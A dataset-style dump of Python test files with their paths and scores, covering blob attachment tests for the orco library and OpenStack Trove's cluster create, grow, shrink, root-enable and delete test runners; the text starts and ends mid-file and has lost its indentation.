return b.get_object("object") - 1
runtime = env.test_runtime()
a = runtime.compute(cc(x=20))
assert a.value == 1999
b = runtime.compute(bb(x=20))
assert b.value is None
assert b.get_object("object") == 2000
with pytest.raises(Exception, match="xxx"):
b.get_object("xxx")
def test_blob_attach_file(env):
@builder()
def bb(x):
with open("test.png", "wb") as f:
f.write(b"1234")
attach_file("test.png")
attach_file("test.png", name="aaa", mime="application/zzz")
@builder()
def cc(x):
b = bb(x)
yield
b.get_blob_as_file("test.png")
with open("test.png", "rb") as f:
assert f.read() == b"1234"
b.get_blob_as_file("aaa", "ddd")
assert not os.path.isfile("aaa")
with open("ddd", "rb") as f:
assert f.read() == b"1234"
return "Ok"
runtime = env.test_runtime()
a = runtime.compute(bb(x=20))
assert a.value is None
v, m = a.get_blob("test.png")
assert v == b"1234"
assert m == "image/png"
v, m = a.get_blob("aaa")
assert v == b"1234"
assert m == "application/zzz"
a = runtime.compute(cc(x=20))
assert a.value == "Ok"
def test_blob_attach_text(env):
@builder()
def bb(x):
attach_text("mytext", "Hello world!")
runtime = env.test_runtime()
a = runtime.compute(bb(x=20))
assert a.value is None
v = a.get_text("mytext")
assert v == "Hello world!"
def test_blob_attach_directory(env):
@builder()
def bb(x):
os.mkdir("testdir")
os.mkdir("testdir/subdir")
with open("testdir/aa.txt", "w") as f:
f.write("Content 1")
with open("testdir/bb.txt", "w") as f:
f.write("Content 2")
with open("testdir/subdir/cc.txt", "w") as f:
f.write("Content 3")
with open("dd.txt", "w") as f:
f.write("Content 4")
attach_directory("testdir")
attach_directory("testdir", name="testdir2")
@builder()
def cc(x):
a = bb(x)
yield
assert not os.path.isfile("testdir/testdir/aa.txt")
a.extract_tar("testdir2")
assert os.path.isfile("testdir2/aa.txt")
assert os.path.isfile("testdir2/bb.txt")
assert os.path.isfile("testdir2/subdir/cc.txt")
assert not os.path.isfile("aa.txt")
a.extract_tar("testdir", target=".")
assert os.path.isfile("aa.txt")
assert os.path.isfile("bb.txt")
assert os.path.isfile("subdir/cc.txt")
return "Ok"
runtime = env.test_runtime()
a = runtime.compute(cc(x=20))
assert a.value == "Ok" | tests/test_blobs.py | import os
import pytest
from orco import builder, attach_object, attach_file, attach_directory, attach_text
def test_blob_validate_name(env):
@builder()
def bb(x):
with pytest.raises(Exception, match="has to be a string"):
attach_object(123, 1)
with pytest.raises(Exception, match="non-empty"):
attach_object("", 2)
with pytest.raises(Exception, match="cannot start with"):
attach_object("!hello", 3)
return "Ok"
runtime = env.test_runtime()
a = runtime.compute(bb(x=20))
assert a.value == "Ok"
def test_blob_attach_object(env):
@builder()
def bb(x):
attach_object("object", x * 100)
with pytest.raises(Exception, match="already exists"):
attach_object("object", x * 101)
attach_object("a-object", x)
@builder()
def cc(x):
b = bb(x)
with pytest.raises(Exception, match="not attached"):
b.get_object("xxx")
with pytest.raises(Exception, match="attach_object"):
attach_object("object", None)
yield
assert ["a-object", "object"] == b.get_names()
return b.get_object("object") - 1
runtime = env.test_runtime()
a = runtime.compute(cc(x=20))
assert a.value == 1999
b = runtime.compute(bb(x=20))
assert b.value is None
assert b.get_object("object") == 2000
with pytest.raises(Exception, match="xxx"):
b.get_object("xxx")
def test_blob_attach_file(env):
@builder()
def bb(x):
with open("test.png", "wb") as f:
f.write(b"1234")
attach_file("test.png")
attach_file("test.png", name="aaa", mime="application/zzz")
@builder()
def cc(x):
b = bb(x)
yield
b.get_blob_as_file("test.png")
with open("test.png", "rb") as f:
assert f.read() == b"1234"
b.get_blob_as_file("aaa", "ddd")
assert not os.path.isfile("aaa")
with open("ddd", "rb") as f:
assert f.read() == b"1234"
return "Ok"
runtime = env.test_runtime()
a = runtime.compute(bb(x=20))
assert a.value is None
v, m = a.get_blob("test.png")
assert v == b"1234"
assert m == "image/png"
v, m = a.get_blob("aaa")
assert v == b"1234"
assert m == "application/zzz"
a = runtime.compute(cc(x=20))
assert a.value == "Ok"
def test_blob_attach_text(env):
@builder()
def bb(x):
attach_text("mytext", "Hello world!")
runtime = env.test_runtime()
a = runtime.compute(bb(x=20))
assert a.value is None
v = a.get_text("mytext")
assert v == "Hello world!"
def test_blob_attach_directory(env):
@builder()
def bb(x):
os.mkdir("testdir")
os.mkdir("testdir/subdir")
with open("testdir/aa.txt", "w") as f:
f.write("Content 1")
with open("testdir/bb.txt", "w") as f:
f.write("Content 2")
with open("testdir/subdir/cc.txt", "w") as f:
f.write("Content 3")
with open("dd.txt", "w") as f:
f.write("Content 4")
attach_directory("testdir")
attach_directory("testdir", name="testdir2")
@builder()
def cc(x):
a = bb(x)
yield
assert not os.path.isfile("testdir/testdir/aa.txt")
a.extract_tar("testdir2")
assert os.path.isfile("testdir2/aa.txt")
assert os.path.isfile("testdir2/bb.txt")
assert os.path.isfile("testdir2/subdir/cc.txt")
assert not os.path.isfile("aa.txt")
a.extract_tar("testdir", target=".")
assert os.path.isfile("aa.txt")
assert os.path.isfile("bb.txt")
assert os.path.isfile("subdir/cc.txt")
return "Ok"
runtime = env.test_runtime()
a = runtime.compute(cc(x=20))
assert a.value == "Ok" | 0.57821 | 0.581897 |
import os
from proboscis import SkipTest
import six
import time as timer
from trove.common import cfg
from trove.common import exception
from trove.common.utils import poll_until
from trove.tests.scenario.helpers.test_helper import DataType
from trove.tests.scenario.runners.test_runners import TestRunner
from trove.tests.util.check import TypeCheck
from troveclient.compat import exceptions
CONF = cfg.CONF
class ClusterActionsRunner(TestRunner):
USE_CLUSTER_ID_FLAG = 'TESTS_USE_CLUSTER_ID'
DO_NOT_DELETE_CLUSTER_FLAG = 'TESTS_DO_NOT_DELETE_CLUSTER'
EXTRA_INSTANCE_NAME = "named_instance"
def __init__(self):
super(ClusterActionsRunner, self).__init__()
self.cluster_name = 'test_cluster'
self.cluster_id = 0
self.cluster_inst_ids = None
self.cluster_count_before_create = None
self.srv_grp_id = None
self.current_root_creds = None
self.locality = 'affinity'
@property
def is_using_existing_cluster(self):
return self.has_env_flag(self.USE_CLUSTER_ID_FLAG)
@property
def has_do_not_delete_cluster(self):
return self.has_env_flag(self.DO_NOT_DELETE_CLUSTER_FLAG)
@property
def min_cluster_node_count(self):
return 2
def run_cluster_create(self, num_nodes=None, expected_task_name='BUILDING',
expected_instance_states=['BUILD', 'ACTIVE'],
expected_http_code=200):
self.cluster_count_before_create = len(
self.auth_client.clusters.list())
if not num_nodes:
num_nodes = self.min_cluster_node_count
instance_flavor = self.get_instance_flavor()
instances_def = [
self.build_flavor(
flavor_id=self.get_flavor_href(instance_flavor),
volume_size=self.instance_info.volume['size'])] * num_nodes
self.cluster_id = self.assert_cluster_create(
self.cluster_name, instances_def, self.locality,
expected_task_name, expected_instance_states, expected_http_code)
def assert_cluster_create(
self, cluster_name, instances_def, locality, expected_task_name,
expected_instance_states, expected_http_code):
self.report.log("Testing cluster create: %s" % cluster_name)
cluster = self.get_existing_cluster()
if cluster:
self.report.log("Using an existing cluster: %s" % cluster.id)
cluster_instances = self._get_cluster_instances(cluster.id)
self.assert_all_instance_states(
cluster_instances, expected_instance_states[-1:])
else:
cluster = self.auth_client.clusters.create(
cluster_name, self.instance_info.dbaas_datastore,
self.instance_info.dbaas_datastore_version,
instances=instances_def, locality=locality)
self._assert_cluster_values(cluster, expected_task_name)
# Don't give an expected task here or it will do a 'get' on
# the cluster. We tested the cluster values above.
self._assert_cluster_action(cluster.id, None,
expected_http_code)
cluster_instances = self._get_cluster_instances(cluster.id)
self.assert_all_instance_states(
cluster_instances, expected_instance_states)
# Create the helper user/database on the first node.
# The cluster should handle the replication itself.
self.create_test_helper_on_instance(cluster_instances[0])
# make sure the server_group was created
self.cluster_inst_ids = [inst.id for inst in cluster_instances]
for id in self.cluster_inst_ids:
srv_grp_id = self.assert_server_group_exists(id)
if self.srv_grp_id and self.srv_grp_id != srv_grp_id:
self.fail("Found multiple server groups for cluster")
self.srv_grp_id = srv_grp_id
cluster_id = cluster.id
# Although all instances have already acquired the expected state,
# we still need to poll for the final cluster task, because
# it may take up to the periodic task interval until the task name
# gets updated in the Trove database.
self._assert_cluster_states(cluster_id, ['NONE'])
return cluster_id
def get_existing_cluster(self):
if self.is_using_existing_cluster:
cluster_id = os.environ.get(self.USE_CLUSTER_ID_FLAG)
return self.auth_client.clusters.get(cluster_id)
def run_cluster_list(self, expected_http_code=200):
self.assert_cluster_list(
self.cluster_count_before_create + 1,
expected_http_code)
def assert_cluster_list(self, expected_count,
expected_http_code):
count = len(self.auth_client.clusters.list())
self.assert_client_code(expected_http_code)
self.assert_equal(expected_count, count, "Unexpected cluster count")
def run_cluster_show(self, expected_http_code=200,
expected_task_name='NONE'):
self.assert_cluster_show(
self.cluster_id, expected_task_name, expected_http_code)
def assert_cluster_show(self, cluster_id, expected_task_name,
expected_http_code):
self._assert_cluster_response(cluster_id, expected_task_name)
def run_cluster_root_enable(self, expected_task_name=None,
expected_http_code=200):
root_credentials = self.test_helper.get_helper_credentials_root()
self.current_root_creds = self.auth_client.root.create_cluster_root(
self.cluster_id, root_credentials['password'])
self.assert_equal(root_credentials['name'],
self.current_root_creds[0])
self.assert_equal(root_credentials['password'],
self.current_root_creds[1])
self._assert_cluster_action(self.cluster_id, expected_task_name,
expected_http_code)
def run_verify_cluster_root_enable(self):
if not self.current_root_creds:
raise SkipTest("Root not enabled.")
cluster = self.auth_client.clusters.get(self.cluster_id)
for instance in cluster.instances:
root_enabled_test = self.auth_client.root.is_instance_root_enabled(
instance['id'])
self.assert_true(root_enabled_test.rootEnabled)
ping_response = self.test_helper.ping(
cluster.ip[0],
username=self.current_root_creds[0],
password=<PASSWORD>[1]
)
self.assert_true(ping_response)
def run_add_initial_cluster_data(self, data_type=DataType.tiny):
self.assert_add_cluster_data(data_type, self.cluster_id)
def run_add_extra_cluster_data(self, data_type=DataType.tiny2):
self.assert_add_cluster_data(data_type, self.cluster_id)
def assert_add_cluster_data(self, data_type, cluster_id):
cluster = self.auth_client.clusters.get(cluster_id)
self.test_helper.add_data(data_type, cluster.ip[0])
def run_verify_initial_cluster_data(self, data_type=DataType.tiny):
self.assert_verify_cluster_data(data_type, self.cluster_id)
def run_verify_extra_cluster_data(self, data_type=DataType.tiny2):
self.assert_verify_cluster_data(data_type, self.cluster_id)
def assert_verify_cluster_data(self, data_type, cluster_id):
cluster = self.auth_client.clusters.get(cluster_id)
self.test_helper.verify_data(data_type, cluster.ip[0])
def run_remove_initial_cluster_data(self, data_type=DataType.tiny):
self.assert_remove_cluster_data(data_type, self.cluster_id)
def run_remove_extra_cluster_data(self, data_type=DataType.tiny2):
self.assert_remove_cluster_data(data_type, self.cluster_id)
def assert_remove_cluster_data(self, data_type, cluster_id):
cluster = self.auth_client.clusters.get(cluster_id)
self.test_helper.remove_data(data_type, cluster.ip[0])
def run_cluster_grow(self, expected_task_name='GROWING_CLUSTER',
expected_http_code=202):
# Add two instances. One with an explicit name.
added_instance_defs = [
self._build_instance_def(self.instance_info.dbaas_flavor_href,
self.instance_info.volume['size']),
self._build_instance_def(self.instance_info.dbaas_flavor_href,
self.instance_info.volume['size'],
self.EXTRA_INSTANCE_NAME)]
self.assert_cluster_grow(
self.cluster_id, added_instance_defs, expected_task_name,
expected_http_code)
def _build_instance_def(self, flavor_id, volume_size, name=None):
instance_def = self.build_flavor(
flavor_id=flavor_id, volume_size=volume_size)
if name:
instance_def.update({'name': name})
return instance_def
def assert_cluster_grow(self, cluster_id, added_instance_defs,
expected_task_name, expected_http_code):
cluster = self.auth_client.clusters.get(cluster_id)
initial_instance_count = len(cluster.instances)
cluster = self.auth_client.clusters.grow(cluster_id,
added_instance_defs)
self._assert_cluster_action(cluster_id, expected_task_name,
expected_http_code, check_locality=False)
self.assert_equal(len(added_instance_defs),
len(cluster.instances) - initial_instance_count,
"Unexpected number of added nodes.")
cluster_instances = self._get_cluster_instances(cluster_id)
self.assert_all_instance_states(cluster_instances, ['ACTIVE'])
self._assert_cluster_states(cluster_id, ['NONE'])
self._assert_cluster_response(cluster_id, 'NONE')
def run_cluster_shrink(
self, expected_task_name=None, expected_http_code=202):
self.assert_cluster_shrink(self.cluster_id, [self.EXTRA_INSTANCE_NAME],
expected_task_name, expected_http_code)
def assert_cluster_shrink(self, cluster_id, removed_instance_names,
expected_task_name, expected_http_code):
cluster = self.auth_client.clusters.get(cluster_id)
initial_instance_count = len(cluster.instances)
removed_instances = self._find_cluster_instances_by_name(
cluster, removed_instance_names)
cluster = self.auth_client.clusters.shrink(
cluster_id, [{'id': instance['id']}
for instance in removed_instances])
self._assert_cluster_action(cluster_id, expected_task_name,
expected_http_code, check_locality=False)
self._assert_cluster_states(cluster_id, ['NONE'])
cluster = self.auth_client.clusters.get(cluster_id)
self.assert_equal(
len(removed_instance_names),
initial_instance_count - len(cluster.instances),
"Unexpected number of removed nodes.")
cluster_instances = self._get_cluster_instances(cluster_id)
self.assert_all_instance_states(cluster_instances, ['ACTIVE'])
self._assert_cluster_response(cluster_id, 'NONE')
def _find_cluster_instances_by_name(self, cluster, instance_names):
return [instance for instance in cluster.instances
if instance['name'] in instance_names]
def run_cluster_delete(
self, expected_task_name='DELETING',
expected_last_instance_state='SHUTDOWN', expected_http_code=202):
if self.has_do_not_delete_cluster:
self.report.log("TESTS_DO_NOT_DELETE_CLUSTER=True was "
"specified, skipping delete...")
raise SkipTest("TESTS_DO_NOT_DELETE_CLUSTER was specified.")
self.assert_cluster_delete(
self.cluster_id, expected_task_name, expected_last_instance_state,
expected_http_code)
def assert_cluster_delete(
self, cluster_id, expected_task_name, expected_last_instance_state,
expected_http_code):
self.report.log("Testing cluster delete: %s" % cluster_id)
cluster_instances = self._get_cluster_instances(cluster_id)
self.auth_client.clusters.delete(cluster_id)
self._assert_cluster_action(cluster_id, expected_task_name,
expected_http_code, check_locality=False)
self.assert_all_gone(cluster_instances, expected_last_instance_state)
self._assert_cluster_gone(cluster_id)
# make sure the server group is gone too
self.assert_server_group_gone(self.srv_grp_id)
def _get_cluster_instances(self, cluster_id):
cluster = self.auth_client.clusters.get(cluster_id)
return [self.auth_client.instances.get(instance['id'])
for instance in cluster.instances]
def _assert_cluster_action(
self, cluster_id, expected_task_name, expected_http_code,
check_locality=True):
if expected_http_code is not None:
self.assert_client_code(expected_http_code)
if expected_task_name:
self._assert_cluster_response(cluster_id, expected_task_name,
check_locality=check_locality)
def _assert_cluster_states(self, cluster_id, expected_states,
fast_fail_status=None):
for status in expected_states:
start_time = timer.time()
try:
poll_until(lambda: self._has_task(
cluster_id, status, fast_fail_status=fast_fail_status),
sleep_time=self.def_sleep_time,
time_out=self.def_timeout)
self.report.log("Cluster has gone '%s' in %s." %
(status, self._time_since(start_time)))
except exception.PollTimeOut:
self.report.log(
"Status of cluster '%s' did not change to '%s' after %s."
% (cluster_id, status, self._time_since(start_time)))
return False
return True
def _has_task(self, cluster_id, task, fast_fail_status=None):
cluster = self.auth_client.clusters.get(cluster_id)
task_name = cluster.task['name']
self.report.log("Waiting for cluster '%s' to become '%s': %s"
% (cluster_id, task, task_name))
if fast_fail_status and task_name == fast_fail_status:
raise RuntimeError("Cluster '%s' acquired a fast-fail task: %s"
% (cluster_id, task))
return task_name == task
def _assert_cluster_response(self, cluster_id, expected_task_name,
expected_http_code=200, check_locality=True):
cluster = self.auth_client.clusters.get(cluster_id)
self.assert_client_code(expected_http_code)
self._assert_cluster_values(cluster, expected_task_name,
check_locality=check_locality)
def _assert_cluster_values(self, cluster, expected_task_name,
check_locality=True):
with TypeCheck('Cluster', cluster) as check:
check.has_field("id", six.string_types)
check.has_field("name", six.string_types)
check.has_field("datastore", dict)
check.has_field("instances", list)
check.has_field("links", list)
for instance in cluster.instances:
isinstance(instance, dict)
self.assert_is_not_none(instance['id'])
self.assert_is_not_none(instance['links'])
self.assert_is_not_none(instance['name'])
self.assert_equal(expected_task_name, cluster.task['name'],
'Unexpected cluster task name')
if check_locality:
self.assert_equal(self.locality, cluster.locality,
"Unexpected cluster locality")
def _assert_cluster_gone(self, cluster_id):
t0 = timer.time()
try:
# This will poll until the cluster goes away.
self._assert_cluster_states(cluster_id, ['NONE'])
self.fail(
"Cluster '%s' still existed after %s seconds."
% (cluster_id, self._time_since(t0)))
except exceptions.NotFound:
self.assert_client_code(404)
class CassandraClusterActionsRunner(ClusterActionsRunner):
def run_cluster_root_enable(self):
raise SkipTest("Operation is currently not supported.")
class Cassandra_22ClusterActionsRunner(CassandraClusterActionsRunner):
pass
class Cassandra_3ClusterActionsRunner(CassandraClusterActionsRunner):
pass
class MariadbClusterActionsRunner(ClusterActionsRunner):
@property
def min_cluster_node_count(self):
return self.get_datastore_config_property('min_cluster_member_count')
def run_cluster_root_enable(self):
raise SkipTest("Operation is currently not supported.")
class PxcClusterActionsRunner(ClusterActionsRunner):
def run_cluster_create(self, num_nodes=3, expected_task_name='BUILDING',
expected_instance_states=['BUILD', 'ACTIVE'],
expected_http_code=200):
super(PxcClusterActionsRunner, self).run_cluster_create(
num_nodes=num_nodes, expected_task_name=expected_task_name,
expected_instance_states=expected_instance_states,
expected_http_code=expected_http_code)
def run_cluster_shrink(self):
raise SkipTest("Operation not supported by the datastore.")
def run_cluster_grow(self):
raise SkipTest("Operation not supported by the datastore.")
@property
def min_cluster_node_count(self):
return self.get_datastore_config_property('min_cluster_member_count')
class VerticaClusterActionsRunner(ClusterActionsRunner):
@property
def min_cluster_node_count(self):
return self.get_datastore_config_property('cluster_member_count')
class RedisClusterActionsRunner(ClusterActionsRunner):
def run_cluster_root_enable(self):
raise SkipTest("Operation is currently not supported.")
class MongodbClusterActionsRunner(ClusterActionsRunner):
def run_cluster_root_enable(self):
raise SkipTest("Operation is currently not supported.")
@property
def min_cluster_node_count(self):
return 3
class CouchbaseClusterActionsRunner(ClusterActionsRunner):
def run_cluster_root_enable(self):
raise SkipTest("Operation is currently not supported.") | trove/tests/scenario/runners/cluster_actions_runners.py |
import os
from proboscis import SkipTest
import six
import time as timer
from trove.common import cfg
from trove.common import exception
from trove.common.utils import poll_until
from trove.tests.scenario.helpers.test_helper import DataType
from trove.tests.scenario.runners.test_runners import TestRunner
from trove.tests.util.check import TypeCheck
from troveclient.compat import exceptions
CONF = cfg.CONF
class ClusterActionsRunner(TestRunner):
USE_CLUSTER_ID_FLAG = 'TESTS_USE_CLUSTER_ID'
DO_NOT_DELETE_CLUSTER_FLAG = 'TESTS_DO_NOT_DELETE_CLUSTER'
EXTRA_INSTANCE_NAME = "named_instance"
def __init__(self):
super(ClusterActionsRunner, self).__init__()
self.cluster_name = 'test_cluster'
self.cluster_id = 0
self.cluster_inst_ids = None
self.cluster_count_before_create = None
self.srv_grp_id = None
self.current_root_creds = None
self.locality = 'affinity'
@property
def is_using_existing_cluster(self):
return self.has_env_flag(self.USE_CLUSTER_ID_FLAG)
@property
def has_do_not_delete_cluster(self):
return self.has_env_flag(self.DO_NOT_DELETE_CLUSTER_FLAG)
@property
def min_cluster_node_count(self):
return 2
def run_cluster_create(self, num_nodes=None, expected_task_name='BUILDING',
expected_instance_states=['BUILD', 'ACTIVE'],
expected_http_code=200):
self.cluster_count_before_create = len(
self.auth_client.clusters.list())
if not num_nodes:
num_nodes = self.min_cluster_node_count
instance_flavor = self.get_instance_flavor()
instances_def = [
self.build_flavor(
flavor_id=self.get_flavor_href(instance_flavor),
volume_size=self.instance_info.volume['size'])] * num_nodes
self.cluster_id = self.assert_cluster_create(
self.cluster_name, instances_def, self.locality,
expected_task_name, expected_instance_states, expected_http_code)
def assert_cluster_create(
self, cluster_name, instances_def, locality, expected_task_name,
expected_instance_states, expected_http_code):
self.report.log("Testing cluster create: %s" % cluster_name)
cluster = self.get_existing_cluster()
if cluster:
self.report.log("Using an existing cluster: %s" % cluster.id)
cluster_instances = self._get_cluster_instances(cluster.id)
self.assert_all_instance_states(
cluster_instances, expected_instance_states[-1:])
else:
cluster = self.auth_client.clusters.create(
cluster_name, self.instance_info.dbaas_datastore,
self.instance_info.dbaas_datastore_version,
instances=instances_def, locality=locality)
self._assert_cluster_values(cluster, expected_task_name)
# Don't give an expected task here or it will do a 'get' on
# the cluster. We tested the cluster values above.
self._assert_cluster_action(cluster.id, None,
expected_http_code)
cluster_instances = self._get_cluster_instances(cluster.id)
self.assert_all_instance_states(
cluster_instances, expected_instance_states)
# Create the helper user/database on the first node.
# The cluster should handle the replication itself.
self.create_test_helper_on_instance(cluster_instances[0])
# make sure the server_group was created
self.cluster_inst_ids = [inst.id for inst in cluster_instances]
for id in self.cluster_inst_ids:
srv_grp_id = self.assert_server_group_exists(id)
if self.srv_grp_id and self.srv_grp_id != srv_grp_id:
self.fail("Found multiple server groups for cluster")
self.srv_grp_id = srv_grp_id
cluster_id = cluster.id
# Although all instances have already acquired the expected state,
# we still need to poll for the final cluster task, because
# it may take up to the periodic task interval until the task name
# gets updated in the Trove database.
self._assert_cluster_states(cluster_id, ['NONE'])
return cluster_id
def get_existing_cluster(self):
if self.is_using_existing_cluster:
cluster_id = os.environ.get(self.USE_CLUSTER_ID_FLAG)
return self.auth_client.clusters.get(cluster_id)
def run_cluster_list(self, expected_http_code=200):
self.assert_cluster_list(
self.cluster_count_before_create + 1,
expected_http_code)
def assert_cluster_list(self, expected_count,
expected_http_code):
count = len(self.auth_client.clusters.list())
self.assert_client_code(expected_http_code)
self.assert_equal(expected_count, count, "Unexpected cluster count")
def run_cluster_show(self, expected_http_code=200,
expected_task_name='NONE'):
self.assert_cluster_show(
self.cluster_id, expected_task_name, expected_http_code)
def assert_cluster_show(self, cluster_id, expected_task_name,
expected_http_code):
self._assert_cluster_response(cluster_id, expected_task_name)
def run_cluster_root_enable(self, expected_task_name=None,
expected_http_code=200):
root_credentials = self.test_helper.get_helper_credentials_root()
self.current_root_creds = self.auth_client.root.create_cluster_root(
self.cluster_id, root_credentials['password'])
self.assert_equal(root_credentials['name'],
self.current_root_creds[0])
self.assert_equal(root_credentials['password'],
self.current_root_creds[1])
self._assert_cluster_action(self.cluster_id, expected_task_name,
expected_http_code)
def run_verify_cluster_root_enable(self):
if not self.current_root_creds:
raise SkipTest("Root not enabled.")
cluster = self.auth_client.clusters.get(self.cluster_id)
for instance in cluster.instances:
root_enabled_test = self.auth_client.root.is_instance_root_enabled(
instance['id'])
self.assert_true(root_enabled_test.rootEnabled)
ping_response = self.test_helper.ping(
cluster.ip[0],
username=self.current_root_creds[0],
password=<PASSWORD>[1]
)
self.assert_true(ping_response)
def run_add_initial_cluster_data(self, data_type=DataType.tiny):
self.assert_add_cluster_data(data_type, self.cluster_id)
def run_add_extra_cluster_data(self, data_type=DataType.tiny2):
self.assert_add_cluster_data(data_type, self.cluster_id)
def assert_add_cluster_data(self, data_type, cluster_id):
cluster = self.auth_client.clusters.get(cluster_id)
self.test_helper.add_data(data_type, cluster.ip[0])
def run_verify_initial_cluster_data(self, data_type=DataType.tiny):
self.assert_verify_cluster_data(data_type, self.cluster_id)
def run_verify_extra_cluster_data(self, data_type=DataType.tiny2):
self.assert_verify_cluster_data(data_type, self.cluster_id)
def assert_verify_cluster_data(self, data_type, cluster_id):
cluster = self.auth_client.clusters.get(cluster_id)
self.test_helper.verify_data(data_type, cluster.ip[0])
def run_remove_initial_cluster_data(self, data_type=DataType.tiny):
self.assert_remove_cluster_data(data_type, self.cluster_id)
def run_remove_extra_cluster_data(self, data_type=DataType.tiny2):
self.assert_remove_cluster_data(data_type, self.cluster_id)
def assert_remove_cluster_data(self, data_type, cluster_id):
cluster = self.auth_client.clusters.get(cluster_id)
self.test_helper.remove_data(data_type, cluster.ip[0])
def run_cluster_grow(self, expected_task_name='GROWING_CLUSTER',
expected_http_code=202):
# Add two instances. One with an explicit name.
added_instance_defs = [
self._build_instance_def(self.instance_info.dbaas_flavor_href,
self.instance_info.volume['size']),
self._build_instance_def(self.instance_info.dbaas_flavor_href,
self.instance_info.volume['size'],
self.EXTRA_INSTANCE_NAME)]
self.assert_cluster_grow(
self.cluster_id, added_instance_defs, expected_task_name,
expected_http_code)
def _build_instance_def(self, flavor_id, volume_size, name=None):
instance_def = self.build_flavor(
flavor_id=flavor_id, volume_size=volume_size)
if name:
instance_def.update({'name': name})
return instance_def
def assert_cluster_grow(self, cluster_id, added_instance_defs,
expected_task_name, expected_http_code):
cluster = self.auth_client.clusters.get(cluster_id)
initial_instance_count = len(cluster.instances)
cluster = self.auth_client.clusters.grow(cluster_id,
added_instance_defs)
self._assert_cluster_action(cluster_id, expected_task_name,
expected_http_code, check_locality=False)
self.assert_equal(len(added_instance_defs),
len(cluster.instances) - initial_instance_count,
"Unexpected number of added nodes.")
cluster_instances = self._get_cluster_instances(cluster_id)
self.assert_all_instance_states(cluster_instances, ['ACTIVE'])
self._assert_cluster_states(cluster_id, ['NONE'])
self._assert_cluster_response(cluster_id, 'NONE')
def run_cluster_shrink(
self, expected_task_name=None, expected_http_code=202):
self.assert_cluster_shrink(self.cluster_id, [self.EXTRA_INSTANCE_NAME],
expected_task_name, expected_http_code)
def assert_cluster_shrink(self, cluster_id, removed_instance_names,
expected_task_name, expected_http_code):
cluster = self.auth_client.clusters.get(cluster_id)
initial_instance_count = len(cluster.instances)
removed_instances = self._find_cluster_instances_by_name(
cluster, removed_instance_names)
cluster = self.auth_client.clusters.shrink(
cluster_id, [{'id': instance['id']}
for instance in removed_instances])
self._assert_cluster_action(cluster_id, expected_task_name,
expected_http_code, check_locality=False)
self._assert_cluster_states(cluster_id, ['NONE'])
cluster = self.auth_client.clusters.get(cluster_id)
self.assert_equal(
len(removed_instance_names),
initial_instance_count - len(cluster.instances),
"Unexpected number of removed nodes.")
cluster_instances = self._get_cluster_instances(cluster_id)
self.assert_all_instance_states(cluster_instances, ['ACTIVE'])
self._assert_cluster_response(cluster_id, 'NONE')
def _find_cluster_instances_by_name(self, cluster, instance_names):
return [instance for instance in cluster.instances
if instance['name'] in instance_names]
def run_cluster_delete(
self, expected_task_name='DELETING',
expected_last_instance_state='SHUTDOWN', expected_http_code=202):
if self.has_do_not_delete_cluster:
self.report.log("TESTS_DO_NOT_DELETE_CLUSTER=True was "
"specified, skipping delete...")
raise SkipTest("TESTS_DO_NOT_DELETE_CLUSTER was specified.")
self.assert_cluster_delete(
self.cluster_id, expected_task_name, expected_last_instance_state,
expected_http_code)
def assert_cluster_delete(
self, cluster_id, expected_task_name, expected_last_instance_state,
expected_http_code):
self.report.log("Testing cluster delete: %s" % cluster_id)
cluster_instances = self._get_cluster_instances(cluster_id)
self.auth_client.clusters.delete(cluster_id)
self._assert_cluster_action(cluster_id, expected_task_name,
expected_http_code, check_locality=False)
self.assert_all_gone(cluster_instances, expected_last_instance_state)
self._assert_cluster_gone(cluster_id)
# make sure the server group is gone too
self.assert_server_group_gone(self.srv_grp_id)
def _get_cluster_instances(self, cluster_id):
cluster = self.auth_client.clusters.get(cluster_id)
return [self.auth_client.instances.get(instance['id'])
for instance in cluster.instances]
def _assert_cluster_action(
self, cluster_id, expected_task_name, expected_http_code,
check_locality=True):
if expected_http_code is not None:
self.assert_client_code(expected_http_code)
if expected_task_name:
self._assert_cluster_response(cluster_id, expected_task_name,
check_locality=check_locality)
def _assert_cluster_states(self, cluster_id, expected_states,
fast_fail_status=None):
for status in expected_states:
start_time = timer.time()
try:
poll_until(lambda: self._has_task(
cluster_id, status, fast_fail_status=fast_fail_status),
sleep_time=self.def_sleep_time,
time_out=self.def_timeout)
self.report.log("Cluster has gone '%s' in %s." %
(status, self._time_since(start_time)))
except exception.PollTimeOut:
self.report.log(
"Status of cluster '%s' did not change to '%s' after %s."
% (cluster_id, status, self._time_since(start_time)))
return False
return True
def _has_task(self, cluster_id, task, fast_fail_status=None):
cluster = self.auth_client.clusters.get(cluster_id)
task_name = cluster.task['name']
self.report.log("Waiting for cluster '%s' to become '%s': %s"
% (cluster_id, task, task_name))
if fast_fail_status and task_name == fast_fail_status:
raise RuntimeError("Cluster '%s' acquired a fast-fail task: %s"
% (cluster_id, task))
return task_name == task
def _assert_cluster_response(self, cluster_id, expected_task_name,
expected_http_code=200, check_locality=True):
cluster = self.auth_client.clusters.get(cluster_id)
self.assert_client_code(expected_http_code)
self._assert_cluster_values(cluster, expected_task_name,
check_locality=check_locality)
def _assert_cluster_values(self, cluster, expected_task_name,
check_locality=True):
with TypeCheck('Cluster', cluster) as check:
check.has_field("id", six.string_types)
check.has_field("name", six.string_types)
check.has_field("datastore", dict)
check.has_field("instances", list)
check.has_field("links", list)
for instance in cluster.instances:
isinstance(instance, dict)
self.assert_is_not_none(instance['id'])
self.assert_is_not_none(instance['links'])
self.assert_is_not_none(instance['name'])
self.assert_equal(expected_task_name, cluster.task['name'],
'Unexpected cluster task name')
if check_locality:
self.assert_equal(self.locality, cluster.locality,
"Unexpected cluster locality")
def _assert_cluster_gone(self, cluster_id):
t0 = timer.time()
try:
# This will poll until the cluster goes away.
self._assert_cluster_states(cluster_id, ['NONE'])
self.fail(
"Cluster '%s' still existed after %s seconds."
% (cluster_id, self._time_since(t0)))
except exceptions.NotFound:
self.assert_client_code(404)
class CassandraClusterActionsRunner(ClusterActionsRunner):
def run_cluster_root_enable(self):
raise SkipTest("Operation is currently not supported.")
class Cassandra_22ClusterActionsRunner(CassandraClusterActionsRunner):
pass
class Cassandra_3ClusterActionsRunner(CassandraClusterActionsRunner):
pass
class MariadbClusterActionsRunner(ClusterActionsRunner):
@property
def min_cluster_node_count(self):
return self.get_datastore_config_property('min_cluster_member_count')
def run_cluster_root_enable(self):
raise SkipTest("Operation is currently not supported.")
class PxcClusterActionsRunner(ClusterActionsRunner):
def run_cluster_create(self, num_nodes=3, expected_task_name='BUILDING',
expected_instance_states=['BUILD', 'ACTIVE'],
expected_http_code=200):
super(PxcClusterActionsRunner, self).run_cluster_create(
num_nodes=num_nodes, expected_task_name=expected_task_name,
